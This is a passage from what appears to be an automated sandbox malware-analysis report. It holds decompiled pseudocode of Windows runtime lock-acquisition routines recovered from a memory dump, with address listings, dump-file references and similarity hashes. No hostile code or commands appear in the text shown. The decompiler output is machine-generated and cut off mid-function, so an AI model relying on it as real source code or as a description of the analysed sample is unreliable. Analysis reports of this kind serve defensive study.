							if(E025706BA(_t124, _t142) == 0 || E02570A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                  0x02570b21
                                                                                                                                                  0x02570b24
                                                                                                                                                  0x02570b27
                                                                                                                                                  0x02570b2a
                                                                                                                                                  0x02570b2d
                                                                                                                                                  0x02570b30
                                                                                                                                                  0x02570b33
                                                                                                                                                  0x02570b36
                                                                                                                                                  0x02570b39
                                                                                                                                                  0x02570b3e
                                                                                                                                                  0x02570c65
                                                                                                                                                  0x02570c68
                                                                                                                                                  0x02570c6a
                                                                                                                                                  0x02570c6f
                                                                                                                                                  0x0259eb42
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eb48
                                                                                                                                                  0x0259eb48
                                                                                                                                                  0x02570c75
                                                                                                                                                  0x02570c7a
                                                                                                                                                  0x0259eb54
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eb5a
                                                                                                                                                  0x02570c80
                                                                                                                                                  0x02570c84
                                                                                                                                                  0x0259eb98
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eba6
                                                                                                                                                  0x02570cb8
                                                                                                                                                  0x02570cba
                                                                                                                                                  0x02570cd3
                                                                                                                                                  0x02570cda
                                                                                                                                                  0x02570ce4
                                                                                                                                                  0x02570ce9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570cec
                                                                                                                                                  0x02570c8c
                                                                                                                                                  0x0259eb63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eb70
                                                                                                                                                  0x0259eb75
                                                                                                                                                  0x0259eb7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eb8c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eb8c
                                                                                                                                                  0x02570c96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570ca2
                                                                                                                                                  0x02570cac
                                                                                                                                                  0x02570cb4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570b44
                                                                                                                                                  0x02570b47
                                                                                                                                                  0x02570b49
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570b4f
                                                                                                                                                  0x02570b50
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570b56
                                                                                                                                                  0x02570b62
                                                                                                                                                  0x02570b7c
                                                                                                                                                  0x02570bac
                                                                                                                                                  0x02570a0f
                                                                                                                                                  0x0259eaaa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eac4
                                                                                                                                                  0x0259eac4
                                                                                                                                                  0x02570bd0
                                                                                                                                                  0x02570bd0
                                                                                                                                                  0x02570bd4
                                                                                                                                                  0x02570bd9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570bdb
                                                                                                                                                  0x02570be0
                                                                                                                                                  0x0259eb0e
                                                                                                                                                  0x02570a1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570a1a
                                                                                                                                                  0x0259eb1a
                                                                                                                                                  0x0259eb1f
                                                                                                                                                  0x0259eb27
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eb36
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eb36
                                                                                                                                                  0x02570bea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570bf6
                                                                                                                                                  0x02570c00
                                                                                                                                                  0x02570c03
                                                                                                                                                  0x02570c0b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570c0b
                                                                                                                                                  0x0259eaaa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570a15
                                                                                                                                                  0x02570bb6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570bc6
                                                                                                                                                  0x02570bc6
                                                                                                                                                  0x02570bcb
                                                                                                                                                  0x02570c15
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570c1d
                                                                                                                                                  0x02570c20
                                                                                                                                                  0x02570c21
                                                                                                                                                  0x02570c24
                                                                                                                                                  0x02570c24
                                                                                                                                                  0x02570c26
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570c26
                                                                                                                                                  0x02570bcd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570bcd
                                                                                                                                                  0x02570b89
                                                                                                                                                  0x02570b89
                                                                                                                                                  0x02570b90
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570b96
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570b96
                                                                                                                                                  0x02570a04
                                                                                                                                                  0x02570a04
                                                                                                                                                  0x02570b9a
                                                                                                                                                  0x02570b9a
                                                                                                                                                  0x02570b9b
                                                                                                                                                  0x02570b9f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570ba5
                                                                                                                                                  0x02570ac7
                                                                                                                                                  0x02570aca
                                                                                                                                                  0x0259eacf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eade
                                                                                                                                                  0x0259eade
                                                                                                                                                  0x0259eae3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eaf3
                                                                                                                                                  0x0259eaf6
                                                                                                                                                  0x0259eaf7
                                                                                                                                                  0x0259eafe
                                                                                                                                                  0x0259eb01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eb01
                                                                                                                                                  0x0259eacf
                                                                                                                                                  0x02570ad0
                                                                                                                                                  0x02570ad4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570ada
                                                                                                                                                  0x02570ae6
                                                                                                                                                  0x02570c34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570c47
                                                                                                                                                  0x02570c49
                                                                                                                                                  0x02570c4a
                                                                                                                                                  0x02570c4e
                                                                                                                                                  0x02570c51
                                                                                                                                                  0x02570c54
                                                                                                                                                  0x02570c57
                                                                                                                                                  0x02570c5a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570c60
                                                                                                                                                  0x02570afb
                                                                                                                                                  0x02570afe
                                                                                                                                                  0x02570b02
                                                                                                                                                  0x02570b05
                                                                                                                                                  0x02570b08
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570b08
                                                                                                                                                  0x02570ae6
                                                                                                                                                  0x02570b44
                                                                                                                                                  0x025709f8
                                                                                                                                                  0x025709f8
                                                                                                                                                  0x025709f9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259eaa0
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fassign
                                                                                                                                                  • String ID: .$:$:
                                                                                                                                                  • API String ID: 3965848254-2308638275
                                                                                                                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                  • Instruction ID: 6e6ed1e275cad24931eadb1fb1ea3ae463f76be601166c2c70217437377eedc6
                                                                                                                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                  • Instruction Fuzzy Hash: 08A19B7198020AEECF25DF64E8447BEBBF9BF45308F24846AD846A72C0D7349645CB59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 02570554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                  			E02570554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026101c0;
									_push(_t144);
									_push(0);
									_t51 = E0252F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02574FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02583F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02583F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E025B217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02583F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02573915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026101c0;
												_push(_t138);
												_push(0);
												_t58 = E0252F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02574FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02583F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02583F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E025B217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02583F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02573915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02555384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0252F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02573915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0252F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02573915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0252F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02573915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02555329(_t110, _t138);
																_t69 = E025553A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                  0x0257055a
                                                                                                                                                  0x0257055d
                                                                                                                                                  0x02570563
                                                                                                                                                  0x02570566
                                                                                                                                                  0x025705d8
                                                                                                                                                  0x025705e2
                                                                                                                                                  0x025705e5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025705e7
                                                                                                                                                  0x025705e7
                                                                                                                                                  0x025705ea
                                                                                                                                                  0x025705f3
                                                                                                                                                  0x025705f3
                                                                                                                                                  0x02570568
                                                                                                                                                  0x02570568
                                                                                                                                                  0x02570568
                                                                                                                                                  0x02570569
                                                                                                                                                  0x02570569
                                                                                                                                                  0x02570569
                                                                                                                                                  0x0257056b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259217f
                                                                                                                                                  0x02592183
                                                                                                                                                  0x0259225b
                                                                                                                                                  0x0259225f
                                                                                                                                                  0x02592189
                                                                                                                                                  0x0259218c
                                                                                                                                                  0x0259218f
                                                                                                                                                  0x02592194
                                                                                                                                                  0x02592199
                                                                                                                                                  0x0259219d
                                                                                                                                                  0x025921a0
                                                                                                                                                  0x025921a2
                                                                                                                                                  0x025921ce
                                                                                                                                                  0x025921ce
                                                                                                                                                  0x025921ce
                                                                                                                                                  0x025921d0
                                                                                                                                                  0x025921d6
                                                                                                                                                  0x025921de
                                                                                                                                                  0x025921e2
                                                                                                                                                  0x025921e8
                                                                                                                                                  0x025921e9
                                                                                                                                                  0x025921ec
                                                                                                                                                  0x025921f1
                                                                                                                                                  0x025921f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025921f8
                                                                                                                                                  0x025921fb
                                                                                                                                                  0x02592206
                                                                                                                                                  0x0259220b
                                                                                                                                                  0x0259220c
                                                                                                                                                  0x02592217
                                                                                                                                                  0x02592226
                                                                                                                                                  0x0259222b
                                                                                                                                                  0x0259222c
                                                                                                                                                  0x0259222f
                                                                                                                                                  0x02592232
                                                                                                                                                  0x02592235
                                                                                                                                                  0x02592235
                                                                                                                                                  0x0259223a
                                                                                                                                                  0x0259223f
                                                                                                                                                  0x02592241
                                                                                                                                                  0x02592243
                                                                                                                                                  0x02592248
                                                                                                                                                  0x02592248
                                                                                                                                                  0x0259224d
                                                                                                                                                  0x0259224f
                                                                                                                                                  0x02592262
                                                                                                                                                  0x02592263
                                                                                                                                                  0x02592268
                                                                                                                                                  0x02592269
                                                                                                                                                  0x02592269
                                                                                                                                                  0x02592269
                                                                                                                                                  0x0259226d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592276
                                                                                                                                                  0x02592279
                                                                                                                                                  0x0259227e
                                                                                                                                                  0x02592283
                                                                                                                                                  0x02592287
                                                                                                                                                  0x0259228a
                                                                                                                                                  0x0259228d
                                                                                                                                                  0x0259228f
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922bc
                                                                                                                                                  0x025922be
                                                                                                                                                  0x025922c4
                                                                                                                                                  0x025922cc
                                                                                                                                                  0x025922d0
                                                                                                                                                  0x025922d6
                                                                                                                                                  0x025922d7
                                                                                                                                                  0x025922da
                                                                                                                                                  0x025922df
                                                                                                                                                  0x025922e4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922e6
                                                                                                                                                  0x025922e9
                                                                                                                                                  0x025922f4
                                                                                                                                                  0x025922f9
                                                                                                                                                  0x025922fa
                                                                                                                                                  0x02592305
                                                                                                                                                  0x02592314
                                                                                                                                                  0x02592319
                                                                                                                                                  0x0259231a
                                                                                                                                                  0x0259231d
                                                                                                                                                  0x02592320
                                                                                                                                                  0x02592323
                                                                                                                                                  0x02592323
                                                                                                                                                  0x02592328
                                                                                                                                                  0x0259232d
                                                                                                                                                  0x0259232f
                                                                                                                                                  0x02592331
                                                                                                                                                  0x02592336
                                                                                                                                                  0x02592336
                                                                                                                                                  0x0259233b
                                                                                                                                                  0x0259233d
                                                                                                                                                  0x02592350
                                                                                                                                                  0x02592351
                                                                                                                                                  0x02592356
                                                                                                                                                  0x02592359
                                                                                                                                                  0x02592359
                                                                                                                                                  0x0259235b
                                                                                                                                                  0x0259235d
                                                                                                                                                  0x02555367
                                                                                                                                                  0x0255536b
                                                                                                                                                  0x02555372
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592363
                                                                                                                                                  0x02592363
                                                                                                                                                  0x02592369
                                                                                                                                                  0x0259236a
                                                                                                                                                  0x0259236c
                                                                                                                                                  0x02592371
                                                                                                                                                  0x02592373
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592379
                                                                                                                                                  0x02592379
                                                                                                                                                  0x0259237a
                                                                                                                                                  0x0259237f
                                                                                                                                                  0x0259237f
                                                                                                                                                  0x02592385
                                                                                                                                                  0x02592386
                                                                                                                                                  0x02592389
                                                                                                                                                  0x0259238e
                                                                                                                                                  0x02592390
                                                                                                                                                  0x02555378
                                                                                                                                                  0x0255537c
                                                                                                                                                  0x02592396
                                                                                                                                                  0x02592396
                                                                                                                                                  0x02592397
                                                                                                                                                  0x0259239c
                                                                                                                                                  0x025923a2
                                                                                                                                                  0x025923a3
                                                                                                                                                  0x025923a6
                                                                                                                                                  0x025923ab
                                                                                                                                                  0x025923ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025923b3
                                                                                                                                                  0x025923b3
                                                                                                                                                  0x025923b4
                                                                                                                                                  0x025923b9
                                                                                                                                                  0x025923ba
                                                                                                                                                  0x025923ba
                                                                                                                                                  0x025923bc
                                                                                                                                                  0x025923bf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589153
                                                                                                                                                  0x02589158
                                                                                                                                                  0x0258915a
                                                                                                                                                  0x0258915e
                                                                                                                                                  0x02589160
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589166
                                                                                                                                                  0x02589166
                                                                                                                                                  0x02589171
                                                                                                                                                  0x02589176
                                                                                                                                                  0x02589176
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589160
                                                                                                                                                  0x025923c6
                                                                                                                                                  0x025923ce
                                                                                                                                                  0x025923d7
                                                                                                                                                  0x025923d7
                                                                                                                                                  0x025923ad
                                                                                                                                                  0x02592390
                                                                                                                                                  0x02592373
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x02592291
                                                                                                                                                  0x02592291
                                                                                                                                                  0x02592293
                                                                                                                                                  0x02592295
                                                                                                                                                  0x0259229a
                                                                                                                                                  0x025922a1
                                                                                                                                                  0x025922a3
                                                                                                                                                  0x025922a7
                                                                                                                                                  0x025922a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922ab
                                                                                                                                                  0x025922ad
                                                                                                                                                  0x025922af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922af
                                                                                                                                                  0x025922b1
                                                                                                                                                  0x025922b4
                                                                                                                                                  0x025922b4
                                                                                                                                                  0x025922b6
                                                                                                                                                  0x025553be
                                                                                                                                                  0x025553be
                                                                                                                                                  0x025553be
                                                                                                                                                  0x025553c0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025553cb
                                                                                                                                                  0x025553ce
                                                                                                                                                  0x025553d0
                                                                                                                                                  0x025553d4
                                                                                                                                                  0x025553d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025553d8
                                                                                                                                                  0x025553e3
                                                                                                                                                  0x025553ea
                                                                                                                                                  0x025553ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025553d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259228f
                                                                                                                                                  0x02592349
                                                                                                                                                  0x0259234d
                                                                                                                                                  0x02592251
                                                                                                                                                  0x02592251
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592251
                                                                                                                                                  0x025921a4
                                                                                                                                                  0x025921a4
                                                                                                                                                  0x025921a6
                                                                                                                                                  0x025921a8
                                                                                                                                                  0x025921ac
                                                                                                                                                  0x025921b6
                                                                                                                                                  0x025921b8
                                                                                                                                                  0x025921bc
                                                                                                                                                  0x025921be
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025921c0
                                                                                                                                                  0x025921c2
                                                                                                                                                  0x025921c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025921c4
                                                                                                                                                  0x025921c6
                                                                                                                                                  0x025921c6
                                                                                                                                                  0x025921c8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025921c8
                                                                                                                                                  0x025921a2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02592183
                                                                                                                                                  0x0257057b
                                                                                                                                                  0x0257057d
                                                                                                                                                  0x02570581
                                                                                                                                                  0x02570583
                                                                                                                                                  0x02592178
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02570589
                                                                                                                                                  0x0257058f
                                                                                                                                                  0x0257058f
                                                                                                                                                  0x02570583
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02592206
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-4236105082
                                                                                                                                                  • Opcode ID: 9a8e8ee1687e241e6a64c059c147cac2036fc4d449694cdd4b1c8e86595aa948
                                                                                                                                                  • Instruction ID: aa9c0507e9fd5d0a55ee9b51777ee6e0ddfba3c64969157a4b38ce10171c32e0
                                                                                                                                                  • Opcode Fuzzy Hash: 9a8e8ee1687e241e6a64c059c147cac2036fc4d449694cdd4b1c8e86595aa948
                                                                                                                                                  • Instruction Fuzzy Hash: 97513B717402127BEF15CE18DC81F6677AABFC4720F218259FD45DB284EA71EC418B98
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 025714C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E025714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2612088; // 0x7775eb7f
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
